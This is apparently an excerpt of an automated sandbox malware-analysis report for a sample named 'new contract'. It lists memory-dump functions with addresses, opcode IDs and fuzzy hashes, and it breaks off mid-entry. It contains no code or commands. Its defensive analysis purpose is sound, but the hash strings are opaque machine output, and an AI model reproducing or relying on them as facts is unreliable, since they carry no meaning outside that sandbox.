                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                            • Instruction ID: 6a00cc6b9300ea75c806c1ccb20a24f0ff47e819058b8682470c586fe9ec3788
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 8451AE71E0021AABDF15DF98C841BFEBBBAAF44354F144169EA01AB340DB34DD45CBA4
                                                                                                                                                                            Function 016AE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                            • Instruction ID: df21c0df117999644209f8f1acd06be9b094b5ddbdd72e65b8bc159bcdad68bf
                                                                                                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D51EB31D0021AEFDF11DF94CD98BAEBB79AF00314F514669DA1267290D7329D40CFA4
                                                                                                                                                                            Function 016E8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                                                                                                                                            • Instruction ID: 5d7023f05a4a96c9456897ae9b764d9fa7ba9be8894af1dfcdca69672efeebc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 13b74418473cd989d863daa5d5ffbecb637153babecc9f5d771b1b586ede1716
                                                                                                                                                                            • Instruction Fuzzy Hash: 9541D1707036119BDA29DB2DCD9CB3BBBDEEF91620F048718E9558B384DB34D811C690
                                                                                                                                                                            Function 016ACBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                                                                                                                                            • Instruction ID: 7fcfe2220be78bd7fa584ea42673db60a2239e3904e6fd58ad0382af0354f35b
                                                                                                                                                                            • Opcode Fuzzy Hash: 83f9d6e7c19daab5321b1469ae9df5b915a8de8eae4b9d6ce58f23e7b1e82893
                                                                                                                                                                            • Instruction Fuzzy Hash: 78517B7290021ADFCB20EFA9CD909AEBBF9FB48364B908519E546A7304D770AD01CFD0
                                                                                                                                                                            Function 016EA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                            • Instruction ID: 25731a8af0a6e91cfb89719a6d9c18c50b4068224925179b1d56f8957256abe9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                                                                            • Instruction Fuzzy Hash: A941D8716067169FDB25CF98CD88A6AB7EAFF90210B05472DED5287340EB30ED19C794
                                                                                                                                                                            Function 016501F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 546987dcad1c498ab5279342411c9e79d226ecc577d66fd4caa93dbefc3a8293
                                                                                                                                                                            • Instruction ID: 549f79feb8d927499f11617bd88ab0b902780ae32f8f330e544f66f22b1ff412
                                                                                                                                                                            • Opcode Fuzzy Hash: 546987dcad1c498ab5279342411c9e79d226ecc577d66fd4caa93dbefc3a8293
                                                                                                                                                                            • Instruction Fuzzy Hash: EC41893690021A9BDB54DFA8C840AEEBBB9AF48710F14816AFD15A7340D735DD42CBA8
                                                                                                                                                                            Function 0164EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 37724d1881b2b2b708040a65d83650aaa0ee5dbd34d1184b6b5115df40c8fccd
                                                                                                                                                                            • Instruction ID: 64514c6c09e7f83c497c555227814ab84c19d465e267f4b76ac8963d51ff0a19
                                                                                                                                                                            • Opcode Fuzzy Hash: 37724d1881b2b2b708040a65d83650aaa0ee5dbd34d1184b6b5115df40c8fccd
                                                                                                                                                                            • Instruction Fuzzy Hash: 9041E4726043029FD721EF28CC80A27B7EAFF88224F00496DEA67C7351DB36E8458B54
                                                                                                                                                                            Function 01662750 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                            • Instruction ID: 3953179b332e5914af633ccae4cf7351b9c6a04263c1b00be3bf22cc3885ffa6
                                                                                                                                                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                                                                            • Instruction Fuzzy Hash: A1514775A016158FCB15CF99C880AAEF7F6FF84720F2481A9D915EB351D730AA42CB90
                                                                                                                                                                            Function 01626154 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4d6976be4c986086d858ef8b7f7372ba26e8c5a6be1a982e7aed62a26cb34250
                                                                                                                                                                            • Instruction ID: c363a290b220ddbbf2e617cbab8dba822527e4513cb25278fcb7e188674fb239
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d6976be4c986086d858ef8b7f7372ba26e8c5a6be1a982e7aed62a26cb34250
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D512670905626DBDB25DB2CCC10BA8BBB1FF12314F1482A9E929A77D1D774A981CF84
                                                                                                                                                                            Function 01620BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 875237efb0db576cdadba43a0ae9736c69f4718deb36c483342246b4c320aa69
                                                                                                                                                                            • Instruction ID: 2f670beee38e984a21f1e958648bb563047613ef7066689c697d15962c3d2862
                                                                                                                                                                            • Opcode Fuzzy Hash: 875237efb0db576cdadba43a0ae9736c69f4718deb36c483342246b4c320aa69
                                                                                                                                                                            • Instruction Fuzzy Hash: BB41A076A406289FDB21DF68CD40BEA77B9EF45740F0100A9E908AB341D734DE85CF95
                                                                                                                                                                            Function 016E866E Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                            • Instruction ID: 901f07b6d5d1972f02ab432b544172814d36648929a0c5e3621db966082a0f31
                                                                                                                                                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 80419475B01115ABDF15DB99CC88ABFBBFEAF84600F1541A9E904A7341D770DD018BA0
                                                                                                                                                                            Function 01620887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 67edd7190d05653a7d8a1c83615253c8d533b6b11070529a377c45c84d0bc549
                                                                                                                                                                            • Instruction ID: bcb5afaf59b461532b34b43f98f1731f9db38cd5b66bcf611f6ae21a25064cca
                                                                                                                                                                            • Opcode Fuzzy Hash: 67edd7190d05653a7d8a1c83615253c8d533b6b11070529a377c45c84d0bc549
                                                                                                                                                                            • Instruction Fuzzy Hash: A941B171A00B129FE725CF28CC80A22B7F9FF89314B109A6DE55787A51E774E846CF94
                                                                                                                                                                            Function 0164A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6d7c56a50e0c9bd8a3d761890e6814c00644f15faee4f84cf2c48b5aa08e31d9
                                                                                                                                                                            • Instruction ID: 5b4c180df1d423c97980fff2f149e09a96127b557f4ba7df3f17d527d33f0c76
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d7c56a50e0c9bd8a3d761890e6814c00644f15faee4f84cf2c48b5aa08e31d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 2541FF32A81205DFDB25DFACCD94BED7BB5FB58320F084269D412AB381DB349901CBA4
                                                                                                                                                                            Function 01628BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 300b131e7f6212a12d03df04e72d32f44bef4fb2d664948d856cc7d5ed10728a
                                                                                                                                                                            • Instruction ID: ec21cdcb056093aae703c357e254329e75f9597c5a9313efcd2af16283f319ef
                                                                                                                                                                            • Opcode Fuzzy Hash: 300b131e7f6212a12d03df04e72d32f44bef4fb2d664948d856cc7d5ed10728a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6141DF72A00622CBD7249F5CCC80A5ABBFAFBA4724F18812ED9029B755C735D842CF90
                                                                                                                                                                            Function 01618918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f3b670c542dd9c16feb753a68fffcffc7656df14dee663e611ff66082b696dc5
                                                                                                                                                                            • Instruction ID: eed63c97f479120a3b8808949c2461c1922cfb4ce5fcab775067d38fcfb91f5a
                                                                                                                                                                            • Opcode Fuzzy Hash: f3b670c542dd9c16feb753a68fffcffc7656df14dee663e611ff66082b696dc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 73414A315087469FD312DF698C40A6BF6EAAF88B54F44092EF984D7260E730DE058B97
                                                                                                                                                                            Function 0161A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                            • Instruction ID: 0844a7421833c86ad8d050fce86df3b885f42fe530ab56a9ad8da3bb56859624
                                                                                                                                                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                            • Instruction Fuzzy Hash: A9415F31A01251DFDB11DEAD8C407BABB72EB50B5AF19C06AE945DB348D73B8D81CB90
                                                                                                                                                                            Function 016209AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2b150b869fea92d453e767372cf638832c9dfd1a05b88e31cb7633b2b09becb2
                                                                                                                                                                            • Instruction ID: 0729c1b29939c8e640f8ef217244bd7623c4eb5658521eb1ace73691983ba782
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b150b869fea92d453e767372cf638832c9dfd1a05b88e31cb7633b2b09becb2
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F416671A01A11EFD721CF18C840B26BBF5FF58314F608A6EE8498B352E771E9428F95
                                                                                                                                                                            Function 01650710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                            • Instruction ID: 1068def3f057096b09278aee1d5b27fd1b2447a05ed7d3d2e1ddf821e431ff9b
                                                                                                                                                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B413875A00605EFDB64CF98C990AAABBF9FF18704F10496DE996D7250D330EA44CF90
                                                                                                                                                                            Function 0162262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 295daa34aacd39af1e2bef6d3e13baaafc1cbf2fb53953a91dc27deea1688aae
                                                                                                                                                                            • Instruction ID: 75b5cf8c37c3ec9a2e3c2d918f8561f1bcb17c05c80ab3a99d8c9da22cff3c71
                                                                                                                                                                            • Opcode Fuzzy Hash: 295daa34aacd39af1e2bef6d3e13baaafc1cbf2fb53953a91dc27deea1688aae
                                                                                                                                                                            • Instruction Fuzzy Hash: 4941AEB1505B21DFCB21EF28CD60B69B7B2FF54720F1086ADD8169B2A1DB70A941CF51
                                                                                                                                                                            Function 0165C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0017a4b130fda84d7e8a68ae37694ed02993f58196ff6f3d90ab208ea9a0315b
                                                                                                                                                                            • Instruction ID: 44aa2dd131f4e88e03fb1c697b26cf297931704e3ea2d744d4d24723e323433f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0017a4b130fda84d7e8a68ae37694ed02993f58196ff6f3d90ab208ea9a0315b
                                                                                                                                                                            • Instruction Fuzzy Hash: A63188B1A01349DFDB52CF68C840B99BBF9EF49724F2085AED519EB251D3329902CB94
                                                                                                                                                                            Function 016A07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a7c9799d43313690d2b4a4cde230d6bd2abb5075d1f1132632d167288ccc58b9
                                                                                                                                                                            • Instruction ID: dac2e5b8d0e04bd0f82df28e8de953bedeac4abd5b65221bbbc7b58648668e3e
                                                                                                                                                                            • Opcode Fuzzy Hash: a7c9799d43313690d2b4a4cde230d6bd2abb5075d1f1132632d167288ccc58b9
                                                                                                                                                                            • Instruction Fuzzy Hash: B941AE729043019BD760DF28C845B9BBBE8FF88724F008A2EF998C7250D770D805CB96
                                                                                                                                                                            Function 016180A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dc0f685c67238c431522b34a120768b230f8215306e50f8100db57e8846742fc
                                                                                                                                                                            • Instruction ID: 719e2d1566a1b65463b461793b843483c640a4aedac7fca62eb276a20985f1a9
                                                                                                                                                                            • Opcode Fuzzy Hash: dc0f685c67238c431522b34a120768b230f8215306e50f8100db57e8846742fc
                                                                                                                                                                            • Instruction Fuzzy Hash: EF41E372E05617AFDB01DF18CC81AA8B7BAFF54761F288629D815A7384D734ED418BD0
                                                                                                                                                                            Function 016A05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6156731f5860058f4477628e8d838e54d5542ed14ccff9719b3801dfa11fa744
                                                                                                                                                                            • Instruction ID: 4b9a3aa0d8b46dbe77809868935034c6363748da0286c4f0a89662d4e70862a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6156731f5860058f4477628e8d838e54d5542ed14ccff9719b3801dfa11fa744
                                                                                                                                                                            • Instruction Fuzzy Hash: A841B1726046529FC320DF68CC40A6AB7E9BFC8700F54461DF99597780E730ED14CBAA
                                                                                                                                                                            Function 01624859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e4aefd5009d045e3c4c784acc8faa964ccb87d51744996b19423adae096c8516
                                                                                                                                                                            • Instruction ID: cf087c688850b717beaede68892443661fede14c47912aea0cdf78c39a99dfda
                                                                                                                                                                            • Opcode Fuzzy Hash: e4aefd5009d045e3c4c784acc8faa964ccb87d51744996b19423adae096c8516
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41BE30B047228BD725DF2CDC94B2ABBAAEF80360F14442DE6468B391DB70D951CF91
                                                                                                                                                                            Function 01618B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e7a44aace2a44bca98a2a5e1dc5137c95469a60b942c7c0ff87a3d6ea624ca26
                                                                                                                                                                            • Instruction ID: 2f18c1de59b34d8bf90bb1b262051ddf31d543d1c7dd4bc55c976985e4e801ac
                                                                                                                                                                            • Opcode Fuzzy Hash: e7a44aace2a44bca98a2a5e1dc5137c95469a60b942c7c0ff87a3d6ea624ca26
                                                                                                                                                                            • Instruction Fuzzy Hash: C0418071A01615CFCB15DF69CD8099DBBF6FF98320B28862ED466A7354DB349941CB40
                                                                                                                                                                            Function 016302E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                            • Instruction ID: 8caf8dc511a1e38541fa7dfd065d81431d807dce477a0d50be68b73db6989f1c
                                                                                                                                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                            • Instruction Fuzzy Hash: C2314631A04246AFEB129B6CCC80B9BBFF9AF54310F0441A9F855D7342C7B4D888CBA4
                                                                                                                                                                            Function 016CE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6e8afb8873556c7e702c830b0b4ba296b45627c5a6704078485a5a48a030be4a
                                                                                                                                                                            • Instruction ID: dd64349d0caed86904edce6c04eaa622ad0046229f04f569065d4b685e329979
